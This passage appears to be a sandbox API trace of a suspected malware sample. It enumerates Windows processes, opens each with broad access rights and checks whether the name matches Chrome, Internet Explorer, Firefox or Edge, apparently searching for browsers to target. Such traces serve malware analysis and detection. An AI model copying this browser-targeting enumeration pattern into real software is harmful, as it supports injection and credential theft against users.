	[0203.253] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0203.254] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x2510
	[0203.254] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.254] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0203.255] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.255] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.255] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.255] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0203.255] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.255] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.255] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0203.256] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x2514
	[0203.256] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.256] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0203.257] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.257] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.257] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.257] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0203.257] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.257] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.257] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0203.258] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x2518
	[0203.258] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.258] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0203.258] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.258] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.259] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.259] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0203.259] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.259] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.259] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0203.260] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x251c
	[0203.260] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.260] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0203.260] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.260] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.260] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.260] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0203.261] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.261] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.261] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0203.262] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x2520
	[0203.262] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.262] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0203.262] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.262] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.262] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.262] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0203.263] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.263] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.263] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0203.263] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x2524
	[0203.264] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.264] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0203.264] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.264] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.264] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.264] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0203.264] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.265] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.265] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0203.265] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x2528
	[0203.265] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.266] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0203.266] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.266] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.266] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.266] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0203.266] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.266] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.267] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0203.267] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x252c
	[0203.267] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.267] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0203.268] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.268] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.268] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.268] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0203.268] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.268] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.269] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0203.269] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x2530
	[0203.270] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.270] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0203.270] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.270] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.270] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.270] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0203.271] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.271] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.271] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0203.271] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x2534
	[0203.272] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.272] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0203.272] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.272] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.272] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.272] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0203.272] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.273] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.273] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0203.273] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x2538
	[0203.273] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.274] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0203.274] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.274] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.274] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.274] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0203.274] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.274] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.275] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0203.275] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x253c
	[0203.275] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.275] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0203.276] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.276] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.276] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.276] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0203.276] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.276] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.276] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0203.277] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x2540
	[0203.277] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.277] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0203.278] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.278] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.278] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.278] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0203.278] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.278] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.278] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0203.279] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x2544
	[0203.279] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.279] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0203.280] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.280] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.280] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.280] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0203.280] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.280] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.280] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0203.281] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x2548
	[0203.281] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.281] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0203.281] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.281] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.282] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.282] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0203.282] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.282] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.282] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0203.283] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x254c
	[0203.283] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.283] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0203.283] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.283] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.284] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.284] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0203.284] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.287] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.287] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0203.288] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x2550
	[0203.288] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.288] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0203.288] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.288] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.288] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.288] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0203.289] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.289] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.289] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0203.290] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x2554
	[0203.290] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.290] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0203.290] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.290] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.290] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.290] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0203.290] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.290] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.291] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0203.291] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x2558
	[0203.291] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.291] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0203.292] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.292] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.292] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.292] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0203.293] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.293] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.293] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0203.294] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0203.294] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0203.295] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x255c
	[0203.295] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.295] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0203.295] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.295] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.296] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.296] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0203.296] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.297] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.297] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0203.298] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x2560
	[0203.298] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.298] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0203.298] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.298] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.298] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.298] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0203.299] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.299] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.299] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0203.300] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x2564
	[0203.300] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.300] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0203.300] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.300] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.300] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.300] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0203.301] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.301] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.301] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0203.302] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x2568
	[0203.302] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.302] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0203.302] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.302] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.302] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.303] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0203.303] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.303] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.303] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0203.304] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x256c
	[0203.304] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.304] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0203.304] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.304] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.305] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.305] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0203.305] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.305] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.306] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0203.306] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x2570
	[0203.307] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.307] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
